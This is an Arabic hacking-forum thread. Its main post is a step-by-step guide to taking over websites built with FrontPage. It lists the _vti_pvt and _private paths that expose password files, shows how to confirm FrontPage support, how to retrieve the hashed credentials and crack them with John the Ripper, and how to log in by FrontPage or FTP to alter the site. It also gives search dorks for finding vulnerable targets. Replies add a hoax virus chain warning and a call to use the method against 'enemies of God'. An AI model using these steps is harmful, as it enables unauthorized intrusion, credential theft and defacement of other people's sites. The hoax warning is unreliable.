اختراق موقع بثغره الفرونت بيج

[دراكولا الزمن]

الموضوع منقول....
........



ما هو الفرونت بيج
يعد فرونت بيج من أهم البرامج استخداماً في إنشاء صفحات الويب و اسهلها و اكثرها انتشارا
لكن فية ثغره قويه تمكنك من امتلاك موقع الضحيه .

***********************************************

شرح الثغره :

عند تنصيب برنامج فرونت بيج يقوم البرنامج باقامة فولدرات وهي :

vti_pvt_/(اخطرهم)
vti_txt_/
vti_cnf_/
vti_log_/
vti_bin_/
private_/

ملاحظة:--
تنفذ الثغرة على المواقع التي صممت بالفرونت بيج ولا تصلح لغيرها و هذا ثخرة اخرى لفرونت بيج

/_private/form_results.txt
/_private/form_results.htm
/_private/register.htm
/_vti_pvt/service.cnf
/_vti_pvt/service.stp
/_vti_pvt/services.cnf
/_vti_pvt/svcacl.cnf
/_vti_pvt/writeto.cnf
/_vti_pvt/access.cnf
/_vti_bin/_vti_aut/author.exe
/_vti_bin/_vti_aut/author.dll
/_vti_pvt/service.pwd
/_vti_pvt/users.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/administrators.pwd
/_vti_bin/shtml.dll
/_vti_bin/shtml.exe
/_vti_bin
/_vti_bin/_vti_adm
/_vti_bin/_vti_aut
/_vti_pvt/writeto.cnf
/_vti_pvt/svcacl.cnf
/_vti_pvt/services.cnf
/_vti_pvt/service.stp
/_vti_pvt/service.cnf
/_vti_pvt/access.cnf
/_private/registrations.txt
/_vti_bin/_vti_aut/dvwssr.dll
/_private/registrations.htm
/_private/register.txt
/_private/register.htm
/_private/orders.txt
/_private/orders.htm
/_private/form_results.htm
/_private/form_results.txt
/_vti_bin/_vti_adm/admin.dll


**********************************************

كيف تعلم ان موقع ما يدعم الفرونت بيج ؟؟؟؟؟؟؟؟؟

وذلك بعدة طرق :---

1-بالذهاب إلى موقع netcraft
http://www.netcraft.com
ستجد مربع على اليسار اكتب فيه اسم الموقع
مثال:www.baby hacker2005.com
واضغط انتر
وبعد البحث راح نشوف النتيجة التالية:
The site http://www.arank.com/ is running Apache/1.3.20 (Unix) mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6 mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6 on Linux
هنا يهمنا ثلاث اشياء:-
1- الملقم وهو:
apache 1.3.20
2- ودعم فرونت بيج
FrontPage/5.0.2.2510
3- النظام وهو
Linux


2-او عن طريق إضافة الجملة
vti_inf.html_/
بعد عنوان الموقع لنفرض أن الموقع:
http://www.baby hacker2005.com
نضيف الجملة ليصبح بهذه الطريقةhttp://www.baby hacker2005.com/_vti_inf.html
وبعدها اضغط Enter
وراح يطلعلك في أول الصفحة هذه الكلمة
Frontpage Configuration Information
أي قد تم تثبيت مجلدات وبرامج الفرونت بيج (يعني ان الموقع يدعم الفرونت بيج)


3-وأيضا تستطيع معرفة الموقع يدعم الفرونت بيج أم لا
بإضافة
vti_cnf_/
بعد عنوان الموقع كهذا المثال:

http://www.baby hacker2005.com/_vti_cnf
واضغط زر الفأرة الأيمن واختار
source المصدر
وابحث عن
vti_generator:Programe
حيث
Programe تعني لنوع برنامج الفرونت بيج والإصدارات الخاصة به

**********************************
كيف يتم تطبيق الثغره ؟؟
الحين وبعد لما عرفنا ان الموقع يدعم frontpage كيف نقدر نوصل لملف الباسوورد؟

يعني وعلى سبيل المثال ان الموقع التالي
http://www.baby hacker2005.com
يدعم fontpage
طيب نذهب إلى ملف vti_pvt_
يعني كذا
http://www.baby hacker2005/_vti_pvt
وأول ماندخله نلاحظ وجود ملفات عديدة وأهم الملفات التي تأتي باسم:

Adminstrator.pwd
Adminstrators.pwd
Service.pwd
Users.pwd
User.pwd
Author.pwd
ممكن ما تلاقيها بالضبط لكن شبيهة منها
*********************************************
ألحين لنفرض إننا فتحنا أحد هذه الملفات ماذا نلاحظ نلاحظ وجود
user**** : p***wd
اسم المستخدم والباسوورد
يعني انا اخترقت موقع بالفرونت بيج ولما جيت ابي اشوف الملفات
طلعلي ملف service يحتوي على user / p***word
وهذا مضمون الملف
baby hacker2005:hi9LHn9wAMuKM
حيث اسم المستخدم : baby hacker2005
الباسوورد المشفرة هي:hi9LHn9wAMuKM

***************************************

ألحين وعرفنا كيف نطلع الباسوورد المشفر ماباقي إلا نفك تشفيره
وهذا يتم ببرامج كثير

***** Jack

John The Ripper

راح نستخدم الأفضل والأكثر تداولا وهو John The Ripper و لي انا شرحتها
في منتديات دكتور ديث بالتفصيل+برنامج.........

***********************************************

إنت ألحين مستريح عندك user**** والـp***word
وش بقالك ؟!!
يقالك تلعب بالموقع لعب ألحين دخوله بعدة طرق وأحسنها من/
1-
frontpage
بعدين
file وتذهب إلى
open ***
وتحط الموقع فتطلعلك الصفحة الرئيسية فير اللي بدك اياه بعدين
save or publish
بعدين بيطلب منك كلمة السر والاسم طبعا الشغلة سهلة تحط الاسم وكلمة السر وتحط
sign

*********************

2-
من FTP
وعليك ببرامج الـFTP المنتشرة
كالـws-ftp
والـpro ftp

ويمكنك عمل الطريقة من DOS ولكن البرامج أسهل ...


وألحين أكيد تبون تجربون على مواقع بس ما تعرفون مواقع تدعم الفرونت بيج؟؟؟
أقولكم روحوا google(4)
http://www.google.com
واكتبوا في إطار البحث
vti_pvt_/
وراح تطلعلك مواقع كثيرة تحتوي على هذه الثغرة
**************************
وعندك محرك بحث
http://www.altavista.com
تكتب في محرك البحث
link:service.pwd
أو
link:adminstrators
وغيرها من الملفات الاحتمال وجود p***word فيها

اتمنى ان وفقة في الشرح ......
_________________


The Man Of Another World



...شكرا

[عمر السيد ميرو]

السلام عليكم ورحمة الله وبركاته





تحذير عاجل لكل من يستخدم
Hotmail و yahoo



الخبر بدوون مقدمات لأنه لا يحتمل التأخير
إذا وصلتك إضافة من شخص


pavlo _88 @ hotmail .com or yahoo

لا تقبل واعمل له بلوك على طول لأنه فايروس
بيسرق معلومات الكمبيوتر

ونرجو من الجميع التعاون في نشر الخبر
لأنه في حالة فتحه فإنك ستخسر
مع الباسووردyour email

وستظهر عبارة تقول: انت متأخر جدا فحياتك ليست جميلة ...
.

.

.

الفايروس
اكتشف حديثا من قبل قرصان اسمه مالك الحياة

ومخترعي الفايروس هم مجموعة من المخترقين الإسرائيليين المراهقين تسمي نفسها
Kill arabs ..
ونرجو من الجميع التعاون

[عمر السيد ميرو]

وارجو من الجميع نشر الخبر لانه مهم جدااااااااااااااا

[شقــى]

مشكورر على المعلومات الجامدة دى

[mustafatifa]

اخى ممكن بنامج الفرونت بيج محتاجه كتير

[mustafatifa]

حد يرد علياااااااااااا

[كولو]

معلومات مفيده تستخدم ضد اعداء الله والمشركين

[سمير السكرى]

ميرسىىىىىىىىىىىىىىىى